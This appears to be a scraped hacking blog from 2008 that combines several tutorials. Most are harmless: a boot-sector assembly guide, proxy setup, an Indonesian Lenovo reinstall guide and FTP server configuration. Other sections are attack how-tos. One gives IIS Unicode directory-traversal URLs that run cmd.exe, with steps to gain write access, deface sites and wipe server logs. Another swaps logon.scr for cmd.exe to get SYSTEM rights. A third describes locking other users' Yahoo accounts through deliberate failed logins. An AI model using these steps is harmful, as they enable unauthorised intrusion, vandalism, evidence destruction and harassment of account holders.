"uncompress [file(s)]" and hit return.

IG's Official Unix Command List

Web Server Holes (Unicode)

2008-12-20T03:50:00.001+07:00

There is a lot of servers that are using IIS (Web server software from Micro$oft). This Web
server, (like all software) have hole, that can be used to gain access to the system. Gain
access mean you can errase, modify, create, files on it. The most famous and used exploit
on IIS is the 'UNICODE HOLE'.

By default, IIS check the URL you ask and see if there is a ..\.. in it. If it find it, it's
mean that someone try to acces up directory. It is possible, but normaly you can't acces up
to the root of the defined public web acces directory. So IIS will stop you if you try for
example :
HTTP://www.server.com/../../../file.txt

The Tricks is to code the / or \ with it's UNICODE value, with this, IIS won't see it, and
will let you go up the root web directory.

Here you can Find the Official "U.W.D" UNICODE SCANNER

Step ONE
Download it ;)

Step TWO
- Run a DOS Command window - Go to the directory you downloaded it -

STEP THREE
C:\> uwd.exe startip endip your_nick
E.G : C:\> uwd.exe 127.0.0.1 127.0.0.255 AloneTrio

Doing this, the UWD scanner will try the unicode 'Tricks' on all server between Startip and
Endip. It create a report file called uwd.txt in the same directory.

Admin Access in a locked Environment!!!

2008-12-20T03:49:00.001+07:00

This is straight for a brain child. It makes so much sense that no one ever thought
to do it.
Enjoy. Also beware to change what you have done. Or any machine that you did the
hack on will
show what you did when the screen saver comes up. The only hard part is finding your
way to C:\prompt or ms-dos. So begin.

If you can log in as an account , drop to DOS start -> run -> cmd, at the C: prompt
type the following (assuming default install locations)

C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr

Now log off the machine, logon.scr is the screen saver that will kick in after 15
minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes
and a DOS prompt with FULL SYSTEM rights will pop up, then just to
C:\> net user administrator
and then log in with the new account.

Try this, might work, as long as he didn't change default permissions on C:\winnt
and C:\winnt\system32 you should be golden.

Writing Your Own OperatingSystem

2008-12-20T03:47:00.000+07:00

How to write an operating system
Writing an operating system is something that can not only be interesting (if you're one of those
people that get turned on by Int 13....) but it is also a great learning experience. Through creating
your own operating system you will learn exactly what goes on behind the scenes, elevating you above
the average programmer that just writes in Visual Basic.

In this tutorial you will be tought by examples, and by the end you should have created your own operating system.

Tools:
EasyOs easyos.zip 300kb
EasyOS is a very simple operating system, it contains all the tools needed to build an operating system.
(Not written by me, although I did add bits to it and mess it up a bit)

A quick explanation of assembly: (see here for a good tutorial)

si and ah Think of si as something to put text into, and ah as something to put numbers into.
mov This (mov)es data. mov ah,0 would move 0 into ah. (The data on the right is moved into the left)
Int Think of these as functions. Different int's do different things when ah is different. Ahem. Eg.
when ah = 0 and you call int 10 it prints si to the screen.
Stuff To put words and stuff in your program you can't just do mov si,'some words' (well, you can but
you wont like the resutls) so instead you have to declare the words first. You do this by putting the
name of what you want the words to be called by, then the data type (nearly always db) then the words themselves. Eg:
name db 'some words'
Jump To give sections of code a label, just type the label and add a : at the end, eg code: .
You can then use jmp to jump to it, eg jmp code If To do an if in assembly you use cmp, eg
cmp al,0 (if al=0). On the next line you then put je code, and if al=0 then the program jumps to
the section of code called code. If you use jne code, then if al is not 0 the program will jump to code.
The stack The stack is where stuff is stored. push pushes stuff into it, pop pulls stuff out.
The following example would put cx into dx:
push cx pop dx

Now you know everything there is to know about assembly, you can now understand most of the program that
boot's EasyOs. Drives (hard drives and floppy's) are split into lots of bits, all 512 bytes long
(enough to fit 512 letters in). These are calle sectors. The first sector is what the computer looks
for when it boots. It is called the bootsector.
Open the folder src and then open boot.asm. Or if you are lazy, just look at the code below (its the same).
; This is a comment
[ORG 0x7C00] ;This just tells the program where it is in the memory. Not important
[BITS 16] ;Not important too.

jmp start ; Jump over BIOS parameter block

start: ;The label for the start of the actual program

push cs ;Put cs onto the stack
pop ds ;Take it out and put it into ds

mov si,Print_loading ;Print loading message
call printstring ;Call is like jump, but it goes back. Like a function

;The complicated bit: Loads the next program
mov ah,02h ;When ah=, int13 reads a disk sector
mov al,4 ;Al is how many sectors to read
mov ch,0 ;The track to read from
mov cl,2 ;Sector Id
mov dh,0 ;Head
mov dl,0 ;Drive (0 is floppy)
mov bx,0x1000 ;Es and Bx put together are where to load the program too (see jmp 0x1000:0x00)
mov es,bx
mov bx,0x00
int 13h ;Int 13 is all functions for disks

mov si,putdot ;Print a ".".
call printstring

jmp 0x1000:0x00 ;Run Bootinit from stack.

printstring: ;Print string routine.
mov ah,0eh ;Mov ah into 0, so int 10 prints
stringloop: ;The following code loads each seperate charcter so it can be printed
lodsb
cmp al,00 ;If al =0, then the string has all been loaded
je endstring
int 10h ;When int 10 is called, and ah=, it prints
jmp stringloop
endstring:
ret ;Ret returns

putdot db '.',0
Print_loading db 13,10,'Loading Easy OS v0.01a...',0
times 425 db 0 ;wastes 425 bytes on purpose, so the sector is full (The program must be 512 bytes long)

You may have noticed that numbers, like int 10h, end in h. They don't have to, it just looks funky (there is a real reason, but it's boring).
Anyway, now copy the program called copyboot in the folder called utils to the folder with test.asm in. Open the dos prompt and type: (Make sure a blank floppy is inserted)
copyboot test.com 0
copyboot is the name of the program, test.com the name of the file to copy, and 0 is the sector.
In the program above all it does is print a string then load whats at sector 1. The program that easyos loads under the src folder called bootinit. If you assemble it with nasm, then copy it to sector 1 and restart, the bootsector will load it.
There isn't much more to be learnt from EasyOs, so run either setup.exe or make.bat to build the whole thing. The difference is setup.exe lets you setup a root password for EasyOs. If you just run make.bat the passwords is the default password: monty (named after my psychotic dog).
Now restart and be amazed. Wow. Pretty crappy, but it isn't that bad.

Fat 12
No, its not a fat people supprt group but a file system. If you try and access the floppy disk Windows will say it need s to be formatted. Formatted? You ask. Formatting is basically organising the sectors so you can give them names. Underneath Windows and Fat, you are still just accessing sectors. I won't go into Fat here, check out http://www.maverick.subnet.dk/ for some info. Anyway, the bootsector needs to have some information in it that when Windows reads it it tells it it is fat. The following BootSector was disgustingly ripped by me of NYAOS (I have no idea what i stands for). With your A* qualification in assembly language you can no doubt understand it.
; NYAOS Boot Sector (C) Copyright Sean Tash 1998
; assemble with:
; nasm -f bin -o bootsect.bin bootsect.asm
bits 16
org 0x7C00

start: jmp short begin
nop
bsOEM db "NYAOS1.0" ; OEM String
bsSectSize dw 512 ; Bytes per sector
bsClustSize db 1 ; Sectors per cluster
bsRessect dw 1 ; # of reserved sectors
bsFatCnt db 2 ; # of fat copies
bsRootSize dw 224 ; size of root directory
bsTotalSect dw 2880 ; total # of sectors if < 32 meg
bsMedia db 0xF0 ; Media Descriptor
bsFatSize dw 9 ; Size of each FAT
bsTrackSect dw 18 ; Sectors per track
bsHeadCnt dw 2 ; number of read-write heads
bsHidenSect dd 0 ; number of hidden sectors
bsHugeSect dd 0 ; if bsTotalSect is 0 this value is
; the number of sectors
bsBootDrv db 0 ; holds drive that the bs came from
bsReserv db 0 ; not used for anything
bsBootSign db 29h ; boot signature 29h
bsVolID dd 0 ; Disk volume ID also used for temp
; sector # / # sectors to load
bsVoLabel db "NO NAME " ; Volume Label
bsFSType db "FAT12 " ; File System type

begin: cli ; disable interrupts
mov [bsBootDrv],dl ; save drive number
mov ax,0x9000 ; put stack at 0x98000
mov ss,ax
mov sp,0x8000

mov cx,[bsTrackSect] ; update int 1E FDC param table
mov bx,0x0078
lds si,[ds:bx]
mov byte [si+4], cl
mov byte [si+9], 0x0F

sti ; enable interrupts
push ds
mov dl,[bsBootDrv] ; reset controller
xor ax,ax
int 0x13
pop ds
jc bootfail2 ; display error message
jmp _l1
bootfail2: jmp bootfail
_l1:
mov ax,0x0000
mov es,ax
mov ds,ax

mov si,MsgLoad ; display load message
call putstr

; find the root directory

xor ax,ax
mov al,[bsFatCnt]
mov bx,[bsFatSize]
mul bx
add ax,word [bsHidenSect]
adc ax,word [bsHidenSect+2]
add ax,word [bsRessect] ; ax holds root directory location
mov word [BootSig],ax

call checkroot

xor ax,ax
add ax,word [start]
add ax,word [bsVolID] ; sector number
add ax,word [BootSig]
sub ax,2 ; correction for a mis-calc
mov cx,word [bsVolID+2] ; number of sectors

mov bx,0x8000
mov es,bx

nextsector: push ax ; save registers
push cx
push dx
push es

xor bx,bx ; set zero offset
call readsect ; read a sector

mov si,MsgDot ; display a dot
call putstr

pop es ; restore registers
pop dx
pop cx
pop ax
mov bx,es
add bx,20h ; increment address 512 bytes
mov es,bx
inc ax ; read next sector
loopnz nextsector

mov ax,0x8000 ; set segment registers and jump
mov es,ax
mov ds,ax
push ax
mov ax,0
push ax
retf

checkroot:
push ax ; save registers
push bx
push cx
push dx
push si
push di

mov ax,0x8000 ; put root directory at 0x80000
mov es,ax
mov ax,32 ; AX = ((32*RootSize)/512) + 2
mul word [bsRootSize]
div word [bsSectSize]
mov cx,ax ; cx holds # of sectors in root
mov word [start],ax
mov ax,word [BootSig] ; get prev. saved loc. for root dir

r1: xor bx,bx
push cx ; save count
push ax ; save sector number
push es
push dx
call readsect
xor bx,bx
l_1: mov di,bx ; set address to check from
mov cx,11 ; check 11 bytes
mov si,FileName ; address of string to check with
repz cmpsb
je foundit
add bx,32 ; check next entry
cmp bx,[bsSectSize] ; end of sector?
je l_2
jmp l_1
l_2: pop dx ; restore registers
pop es
pop ax
pop cx
inc ax ; read next sector
loopnz r1
jmp bootfail
foundit: pop dx ; get these off the stack
pop es
pop ax
pop cx

mov di,0x1A ; get clustor #
add di,bx
push bx ; save bx for finding # of sectors
mov ax,[es:di]
xor bx,bx ; calculate sector #
mov bl,[bsClustSize]
mul bx ; ax holds sector #
mov word [bsVolID],ax

pop bx ; get location of directory entry
mov di,0x1C
add di,bx
mov ax,[es:di] ; put number of bytes in ax
xor dx,dx
mov bx,[bsClustSize] ; # of bytes / 512
div bx
inc ax
mov word [bsVolID+2],ax ; save number of sectors to load

pop di ; restore registers
pop si
pop dx
pop cx
pop bx
pop ax

ret ; return to caller

putstr: ; SI = address of string to display
lodsb
or al,al
jz short putstrd
mov ah,0x0E
mov bx,0x0007
int 0x10
jmp putstr
putstrd: retn ; return to caller

bootfail: ; display failure message
mov si,MsgBad ; display error message
call putstr
xor ax,ax ; wait for keypress
int 0x16
int 0x19 ; reboot

readsect: ; ES:BX = Location ; AX = Sector
mov si,[bsTrackSect]
div si ; divide logical sect by track size
inc dl ; sector # begins at 1
mov [bsReserv],dl ; sector to read
xor dx,dx ; logical track left in ax
div word [bsHeadCnt] ; leaves head in dl, cyl in ax
mov dh, [bsBootDrv] ;
xchg dl,dh ; head to dh, drive to dl
mov cx,ax ; cyl to cx
xchg cl,ch ; low 8 bits of cyl to ch, hi 2 bits
shl cl,6 ; shifted to bits 6 and 7
or cl, byte [bsReserv] ; or with sector number
mov al,1 ; number of sectors
mov ah,2 ; use read function of int 0x13
int 0x13 ; read sector
jc bootfail ; display error message
ret ; return to caller

padding times 45 db 0
FileName db "OSLOADERCOM"
MsgBad db "Disk Error...",13,10,0
MsgDot db ".",0
MsgLoad db "doors loading",0
BootSig db 0x55, 0xAA

Anyways, copy the above program, save it, build it with nasm, copy it with copyboot.
As you can guess above, it loads a program called 'OSLOADER.COM' off of the floppy. So, if you want a particularily funky os, build the following with nasm:
;Funky squares
;
;Assembles with NASM
;Made by Frej somewhere between april and may 2000
;Bits reprogrammed to run within DeviatorOS
;
;This demo is just to show you how small graphical demos can get ;)
;Reprogrammed for DeviatorOS as demo program

org 0x0000
mov ax,cs
mov ds,ax
mov es,ax ; fix segment regs

start: mov bx,cs ;put codesegment to bx
add bh,0x20 ;add 2000 to bx
mov ds,bx ;and put it to ds
mov ax,0x13 ;set ax to videomode 13
int 10h ;and do that
Main: push ds ;put buffer seg to stack
pop es ;and put that into es
in ax,0x40 ;generate "random" number (timer)
shl ax,4 ;multiply random # with 16
mov di,ax ;box offset (random)
mov al,255 ;color of the box
mov bx,50 ;height=50
pl: add di,270 ;di+270 (320-width(50))
mov cx,50 ;# bytes to copy to buffer
rep stosb ;and do it
dec bx ;decrement bx
jnz pl ;jump if bx not zero
mov bh,0xFA ;assume bl = 0 (-> bx = FA00)
Smudge: mov al,[bx+1] ;right color to al
mov cl,[bx-1] ;left color to cl
add ax,cx ;and add it to ax
mov cl,[bx-320] ;upper color to cl
add ax,cx ;and add it to ax
mov cl,[bx+320] ;lower color to cl
add ax,cx ;and add it to ax
shr ax,2 ;divide with 4
mov [bx],al ;and but the avarage color to buffer
dec bx ;decrement bx
jnz Smudge ;jump if bx not zero
mov ax,0xA000 ;vga seg
mov es,ax ;put it to es
mov ch,0xFA ;# bytes to copy to vga
xor di,di ;zero vga offset
xor si,si ;zero buffer offset
rep movsb ;and do that
in al,0x60 ;check for keys
dec al ;was it esc?
jnz Main ;nope, continue
mov ax,3 ;text mode
int 10h ;get back into text mode
xor ah,ah ;yes, return to OS
int 0x18 ;back to good old kernel
;Note:- This was, as you can guess, ripped by from an os. So when it goes back to the 'good ol kernel' it just restarts.

Build it with nasm, but rather than faffing around copyboot, just name is as OSLOADER.COM and copy it to the floppy.
Now restart and enjoy the funkiness. Woah dood.

C
Time to escape assembly language. The boot sector has to be written in assembly, but nothing else does. Unfortunately you can't just go and write a cool shell with Visual C++. First of all, its has to be a .com program, not .exe.
.exe programs are just .com with a bit of extra info. at the start giving some info on what the program is. It's very easy to add .exe capabililty to an os, or you can download a program called exe2com.
The serious problem though is that you can create your own ints to make things easier. EasyOs does this (look in kernel.asm under the src folder) and Dos does this too (Dos makes int 21). By default, compilers build a program with these ints.

Proxy Servers

2008-12-20T03:42:00.001+07:00

A. What are Proxy servers

Well before we can explain what proxy servers are we must show you alittle how the internet works. The internet has thousands of users. How does it indentify each user? Well it does it by "packets" these packets tell alot about you and your computer. When you connect to let's say Yahoo.com packets are sent to yahoo.com servers and inside the packets the following data is sent:

Your I.P. Number
Your Operating System
The date and time you where connected
and any data you submitted to yahoo.com

This is how they work. Now, How is this a security risk? Well if you visit some hacker sites thet can get your ip and hack you and they can find informaiton about your os and that helps a hacker because he can look up exploits for your os and so fourth. So we are going to show you how to hide your real ip using a http:// proxy and we will talk about socks and http:// tunneling. Now how does a proxy server work? A proxy server works like this. Instead of your computer connecting to yahoo.com directly and sending packets this is what a proxy does. Your computer connects to the proxy. The proxy then connects yahoo.com and then the proxy sends the page to you. Instead of your ip being shown on that page the proxy's ip is shown Thus hiding your ip.

B. Enable a Proxy Server

Ok to enable a proxy server open up internet explorer. Now go to the following:

Tools > Internet Options

Now when the internet options dialog appears click on the tab that says "Connections" You will then see a button that says Lan settings. Click on this button. Now once you have clicked up on this button you will see a check box that says "Use proxy server for lan" Now check that box and enter a proxy server and a port number. You can get them by going to stayinvisible.com. Now once you have a proxy server your not done yet. Your still unsecure. There are alot of ways to get your ip still. Now before you close that box out click on advaned. You will see a a button next to the port number field that says "advaned..." click this button. Once you click it another dialog appears that is called "proxy settings" Now you will see a check that says "Use the same proxy server for all protocals" un-check this. Now just click ok for now and then apply the new settings. Now you cant use a proxy if your running on a windows 9x machine. Anyway we will come back to why we did this later in this article.

C. Your Os and other info.

Now let's say you are running on a xp os and you have a proxy with this address enabled: "293.223.232" so now your packets send this info:

293.223.232 5:01 PM 12/8/2003 Windows xp, MISE 4.0 (Comaptiable with IE6;Win32)

Now you got your ip hidden but they can still see your Os and your Internet browser. There is a quick and easy way to fix this. Hold down the windows logo key + r and the run dialog appears. Type in regedit and then click ok. The registry editor has appeared. Now navigate to this key to change your os version:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

and you will see all of your information. Now Only Change the following keys:

The Version
Your name

dont change the c:\windows keep that as your root directory! I am warnign you! Now when you restart your machine when you visit your website it will say whatever os you typed in there. I have linux mandrake listed for mine. Now once you changed that navigate to this key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent

and change that to whatever you want.

Now when you surf the internet the packets send this data out:

293.223.232 5:01 PM 12/8/2003 Linux Mandrake, Opera Webbrowser

See I faked all of my information. And if you want to go further change the clock's time and date.. But that wont help the hak0r much. lol =)

D. Socket Proxys

Now Socket proxys they dont work like http:// one's do. Socket proxys work with individual programs such as Aim and Icq and so fourth. Now socket proxies are going to be harder to find then http ones. That is because there's just not a real demand for them. So go to google and type in one of the below

index of/socket proxies

or

socket+proxies

and so on... Now once you have found one open up internet explorer again and go back to tools > internet options > connections tab > lan settings > advaned... and where it says socket proxies put your socket proxie. now be aware that http:// proxies will not work for a socket p roxie. You have to find one for sockets. Once you enter it your and apply it your more secure then you where before you read this tutorial. Now there is one more security issue and that is cookies. I would suggest you limit your cookies to a certain size and also maybe have a program "delete" all of the cookies after you close a internet session. Anyway I hope this tutroial has helped.

unicode

2008-12-20T03:32:00.001+07:00

The unicode bug is a bug in the UNICODE character set which is installed with
IIS4.0/5.0 which usually runs on NT4/Win2k respectively. As rfp put in his
wiretrip.net post, "IIS seems to decode UNICODE at the wrong instance
(after path checking, rather than before)." And so it is exploitable.

The first occurance of the unicode bug was when someone (anonymous person)
said they could execute commands on an IIS5.0 webserver with the following URL:

http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\

And they gave a "live" example to prove their find. This lead to many security
analysts researching into this "bug" some more to see if it was not just only
a server specific hole, and was in fact a hole in _all_ IIS4.0/5.0 systems.

The research was successful, and it was concluded that the UNICODE bug was a
security hole in _all_ IIS webservers that lead to remote users being able to
execute commands on the vulnerable machine.

The funny thing with unicode, is that the exploit differs for each UNICODE character
set. For instance, if you are using an IIS server which is in Chinese (.cn), then
it is using a different UNICODE character set to English (.uk) systems. And so the exploit
is different depending on the UNICODE character set in use.

Well, there are *many* Unicode exploit strings that are "successful" so I am not going
to list them here. You can find them on bugtraq, packetstorm etc.

Firstly, it doesn't matter what OS the machine you are attacking is using. It is a web
server specific hole that we are exploiting, and so as long as the server is IIS 4.0
or 5.0, the OS doesn't matter. So *if* (you won't, trust me) you find a OpenBSD system
running an "out-of-the-box" install of IIS4.0, this is your lucky day. I have only ever
attacked WindowsNT/2k with the unicode bug, so I am not quite sure how it would work on
a *nix system, how the fuck would you get c:\winnt on a *nix system? heh..

Firstly, get the Perl script from the Scripts section of g0tr00t.net,

http://195.13.75.249/shell.pl

This is a Perl script that will scan the host you give it for the unicode bug. If it finds
it is exploitable, it will let you know ;)

Okay, so now use this perl script and enter the host you want to scan (it *must* be on
IIS4.0/5.0 remember) and let the script do it's stuff.

If it tells you it is vulnerable (you will know if it is) then take the complete URL it gives
you, and paste it into your browser. Using the .pl script to actually execute commands on
the system is stupid, it doesn't work very well, your browser is the best tool for this :)

So your URL is something like this:

http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\

Okay, so first we need "write access" to the drives on the machine. Execute this command:

cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\system32\cmd1.exe

Now change the URL you are using to this:

/winnt/system32/cmd1.exe?/c+dir+c:\

You now have write access, test it by doing:

cmd1.exe?/c+echo+hello!+>+c:\test.txt
cmd1.exe?/c+echo+hello!+>+d:\test.txt

If you get an access denied error, then you _can't_ get write access, so fuck it, find another
server.

-= Defacing =-

Well, this tutorial is not for defacing, but I can tell you that the *default* webserver directory
is in:

c:\InetPub\WWWRoot

But you can find any HTML files by doing:

cmd1.exe?/c+dir+/S+c:\*.html

So you can find the HTML easily then :)

To deface it, just echo your message to a file, then "copy index.html backup.html",
then "copy your-file index.html"

-= Cleaning Up =-

Well, it is important to know that ALL IIS SERVERS WILL LOG YOUR ACTIONS. They will have a basic
HTTPd log with the stuff you have been doing, so uhm I suggest you use a proxy server before
exploring any systems.

The logs, by default are in C:\WINNT\SYSTEM32\LOGFILES\W3SVC32 but almost definately will not be
there, so execute this command:

cmd1.exe?/c+dir+/S+c:\*W3SVC32

And you _should_ find them. It is best to remove them too btw :)

You might not be able to remove the log file in use (as it is in use). Try and echo over it or something
so that it is clearned.

-=[ Patching UNICODE ]=-

Okay, if you're an admin of a system that runs IIS, you most probably want to patch your system(s) ;)

So, for IIS4.0 goto:

http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/

For IIS5.0 goto:

http://www.microsoft.com/windows2000/downloads/critical/q269862/

And for other Windows updates (patch up guys!), goto:

http://security.alldas.de/patches/?op=detail&distribution=Windows

I suggest you signup to the Windows security mailing lists too, so go to:

http://www.microsoft.com/technet/security/notify.asp

Wireless Scanning – Wardriving / Warchalking

2008-12-20T03:28:00.000+07:00

What is wireless scanning?

Wireless scanning is a method to find an available wireless network access point. It allows you to identify wireless networks through the use of WNIC (wireless network interface card) running in promiscuous mode and a software that will probe for access points. Once an open wireless access point is found, the wardriver usually maps it, so at the end he would have a map of access points with their properties (SSID, WEP, MAC etc.). Whenever the attacker wants to return into the network, he/she usually logs packets for later analysis, or to run them though a WEP key cracker when a weak key is being used.

There are many different types of wireless scanning. The most known and used scanning method is Wardriving, next comes Warchalking. There are many other methods such as Warstrolling, Warflying etc., however this articles deals with Wardriving and Warchalking only.

Why “War”?

The term “war”, which is used in Wardriving, Warchalking etc., was taken from the old days of WarDialing. WarDialing, the hacking practice of phoning up every extension of a phone network until the number associated with a modem is hit upon, has been replaced by WarDriving with the introduction of wireless LANS.

WarDriving – Let’s take a drive…

Wardriving is the first and well known method used to find available wireless networks (means unsecured). It is usually done with a mobile device such as a laptop or iPaq. Wardriving scanning is accomplished in an easy way: the attacker takes the device with him/her into a car, and detects networks (NetStumbler for Windows, BSD-AriTools for BSD, and airsnort for Linux). Once an open access point is detected, the attacker maps it, explores, or stumbles into a pipe to the internet.

The equipment necessary to WarDrive is: A wireless network interface card (PCMCIA), a device capable of locating itself on a map (GPS, not always necessary), a laptop or any other mobile device, Linux Red Hat or Debian (Windows is not recommended), Wireless tools (WEPCrack, AirSnort etc.).

The equipment is all off the shelf and pretty inexpensive.

WarChalking – The hobo language

“Now a new "language" is developing, WarChalking. The idea is based on the "hobo symbols" and is there to tell persons on the street where there is an open wireless network node, and what the settings are. It may look like incomprehensible squiggles, and most people would walk past thinking it is odd graffiti, but it conveys a lot of info that is understood by the hackers. Furthermore, it is now being adopted by those that are sharing networks voluntarily as a way to give the info out to the community." – Zig

WarChalking was conceived by a group of friends in June 2002, and published by Matt Jones.

WarChalking is simply drawing a chalk symbol on a wall or pavement to indicate the presence of a wireless network, so that other can easily notice it and the details about it. WarChalking is a the modern version of the hobo sign language, which was used by low-tech kings of the road to alert each other to shelter, food and potential trouble. The chalks symbols are nothing more than giving a visual cue to of a wireless network.

The following are the WarChalking symbols:

Symbol Key

SSID Open Node
)(
Bandwidth

SSID Closed Node
()

WEP Node SSID Access Contact
( W )
Bandwidth

Example for a WarChalking symbol:

Retina
)(
1.5

This symbol indicates a open node with SSID “Retina” and bandwidth equal to 1.5MBps.

With the use of these symbols, wardrivers can a lot about the node, and whether this is a worth network. Anyone initiated in the ways of WarChalking will recognize what it means, and get online.

Securing WLANs

Securing a wireless network is much simpler than securing a wired network. Building a secure wireless network can be done within few steps. So, you ask yourself “why then it’s easy to break into a wireless network?” the answer is very simple. Whenever a company wants to connect their employees wirelessly into the company network, the administrators often forget to change the default settings of a router, firewall, access point, enabling WEP and more.

Further more, far too many systems administrators forget that the wireless network extends beyond the walls of a building. There may be security guards at the door, and firewalls on the fixed cable network, but the wireless back door is wide open.

The Wireless network security issues are not discussed in this article. WLANs security issues were discussed in my previous article “Wireless Security & Hacking”.

Links & Sources

http://www.wifimaps.com - Map server listing wireless access points.

http://www.kraftvoll.at/software/index.shtml - GPS driving software for Linux.

http://www.kismetwireless.net - Wireless console bases sniffer. It supports GPS and has a lot of features.

http://airsnort.shmoo.com - Wireless GUI sniffer for breaking WEP keys.

ftp.cs.pdx.edu/pub/mobile - FreeBSD WScan

http://www.blackbeltjones.com/warchalking/warchalking0_9.pdf - WarChalking Symbols

http://wepcrack.sourceforge.net - WEPCrack – Linux

http://www.blackalchemy.to/Projects/fakeap/fake-ap.html - Fake AP - Linux

http://prismstumbler.sourceforge.net/ - PrismStumbler – Linux

http://www.bastard.net/~kos/wifi/ - SSID Sniff – Linux

http://www.techm.com/font2.html - Hobo Symbol Type Font

Yahoo! Account Lockers

2008-12-20T03:24:00.002+07:00

Many people on Yahoo! have asked me how do Yahoo Account lockers that are usually included inside of booters, How do they work? Do they connect to some server and change settings or what? Well, They really don't do much. When someone signs up for a Yahoo! Account each time they want to access a Yahoo! Service the next time they come back Yahoo! Prompt's them for a username and password to log-in to there accounts.

Well, Here is how a booter works. When you specify a Yahoo! Username into the program and click lock it will attempt to sign-into that account using random numbers for the password. After about 10 attempts or Less Yahoo! Locks the account for security reasons. Now, This is so easy to make but alot of people dont know how easy it is. Now you may ask if my account is locked how do I by-Pass it? Well you by-pass it by signing in on a foriegn country site. So if your account is a registered account on the Yahoo! American site (Http://www.Yahoo.com) go to The U.K. Site and log-in (Http://Uk.Yahoo.Com) and you will be able to bypass the 12 hour lock on your account.

I consider Yahoo! Account lockers lame but fun. Let's say some lamer is harassing you then when that person signs off lock his account and he can't sign on for twleve hours on messenger, but he can with email using the trick above. Still takes care of a lamer for 12 Hours. If you dont know how to program these kinds of programs look at sources on my site or booter sites or go to Planet-Source Code (Http://www.Pscode.com) and look for Yahoo! Modules and Api Calls. If your a good Visual basic Programmer like me you can easily make your own booter with the winsock and api calls.

Install Ulang Komputer IBM Lennovo

2008-12-12T18:24:00.001+07:00

1.Backup dulu data dari hardisk (bisa dengan cara partisi atau copy ke
flash disk)
2.Komputer hidupkan, waktu Komputer masih melakukan booting tampilan dos
klik tombol F11.
3.Akan muncul tulisan “Setup is inspecting your Komputer’s
hardware configuration…”
4.Proses “Please Wait…” biarkan apa adanya.
5.Pada tampilan Lennovo Rescue and Recovery 3, biarkan Komputer berproses
6.Akan muncul tampilan “Welcome to Rescue and Recovery”, klik
Continue pada pojok sebelah kanan bawah.
7.Untuk memulai format dan install ulang tampilan “Rescue dan
Recovery”, di kolom sebelah kiri ada “Rescue dan

Restore”, yang terdiri dari “Recovery Overview”,
“Rescue Files”, “Restore your system”,
“Create migration File”.
8.Pilih “Restore your System”
9.Klik Ok bila muncul “If you want to access a USB device but it
does not show in the destination or source list, dsb”.
10.Pada tampilan “Restore your System” yang terdiri dari 6
tahapan, Step pertama pilih “Restore my hard drive to the original
factory state”, klik Next.
11.Pada step 3 pilih “I don’t want to save any files”,
klik Next.
12.Pada step 6 klik Next untuk melanjutkan proses installasi.
13.Tampilan “Product Recovery – Lennovo Best Software
Selector”, klik Next.
14.Tampilan term conditions pilih “I accept these terms and
conditions”, klik Next
15.Bila muncul “More than one partition was detected on your hard
disk”. Pilih “Format the C:\ partition only”, klik Next.
16.Kemudian pilih “Full Factory recovery”, klik Next.
17.Klik Next.
18.Proses Installasi lagi berjalan, tunggu sampai selesai…
19.Pada tampilan Product Recovery, restart Komputer, Klik Yes.
20.Setelah Komputer direstart, aka nada tampilan windows “Preload
System Setup” biarkan Komputer mengcostumize sendiri penginstallan
aplikasi dan driver bawaannya IBM Lennovo.
21.Bila costumize selesai, Installasi telah selesai. Komputer bisa
langsung digunakan dan jangan lupa Komputer yang telah diinstall
diregister ke web Microsoft.

Setting up a FTP server on your own computer

2008-12-10T23:55:00.001+07:00

Setting up
-------------
1. Install the program as u would normally, then start the program.
2. You'll see a menu at the top, and pictograms beneath it.
3. First we have to make a new user account, goto the pictogram bar and click user accounts (the pictogram with 1 head on it).
4. When u click on that a new menu pops up, goto the far right of that menu and you'l see "user accounts" right click in the white empty space,
and select "add", and enter a new account name.
5. Then when u returned to the main menu you'l see under setup some basic options which u can set.

---Login---
The login name you use to access you're ftp
---Password---
The password for the ftp server it generates a random 1 but u can change it for anything else
---home IP---
Select the IP of your computer.
---group name---
Best to leave that empty

When u did all that goto access rights and right click in the white plane, select "Add" and select the map u wish to run ure FTP in.
When done look at the right you will see some options you can check or uncheck, i'll explain themem.

---read---
A remote computer can download from your FTP server
---write---
A remote computer can upload files to your computer
---Delete---
A Remote computer can delete files from your computer, i suggest you don't use that
---append---
This option will alow resume downloading, if someone is uploading to you're computer and he gets disconnect or something he can always resume downloading from the point he left, the same applies for downloading.

-----------
Directories
-----------

---Make---
A remote computer can make a new folder in ure server but only in the directory u run ure dtp server in.
---list---
This allows a remote computer to see the list of directories
---Delete---
This allows a remote computer to delete maps and directories i suggest u don't use this.
---SubDirs---
This will allow a remote computer to access sub directories in the ftp server.

ok now we have done that lets take a look at the left side of the menu.
u'l see a row of pictograms
-setup
-Miscellanous
-links & messages
-ratio, Quota , Bps
-IP & banned files
-notes
-status

I'm gonna discuss everyone of them, since we already have handles setup i leave that out.

----------
Miscellanous
----------
---Enable account---
should always be checked if not you cannot login using that account
---Enable timeout---
If the user of the account is been inactive for the secons u apply he will be disconnected.
---User by-passes server max. user limit---
if the maximal users on the server is reached this account can still login, if checked.
---Max no of users---
This is the maximum number of people that can login under the account.
---Max no of conenctions per IP---
The maximum times a user can connect through the same IP

------files------

---Show relative path---
If you are in a subdir it will make a map with "/" that returns u to the main dir
---hide files/dirs with "hidden" attribute set---
If a file is hidden it wont be shown on the server if checked.

-----commands-----

---allow NOOP command---
This command keeps connections alive nothing more u should keep it checked.
---user can change his password---
As it says a user can change his password whenever he wants too
---user can chat with other users---
A user can chat with other people on the ftp server through the command
---user can know who is connected---
The user can see who else is on the FTP server

-------------
Links & messages
-------------

------virtual file system-------

---Links to add to directories---
This command add links to other directories displayed as maps.

---Treat as Links---
Redirects the people to the link directory

---Treat as Virtual Directories---
This leads to people to the target directory but it still looks like you are in the Home directory

---Add links from this file---

File's that contain links will be added in the main directory

---Resolve windows shortcuts---

When you do that the link will be shown as a a map with a shortcut arrow like on the Desktop

---Auto-include link pointing to home directory---

this will add a shortcut map so if ure in a other directory u can lick it and return to the home directory

---Show login message---

Shows a Welcome message after the user has logged into the FTP---

---Show change dir message---

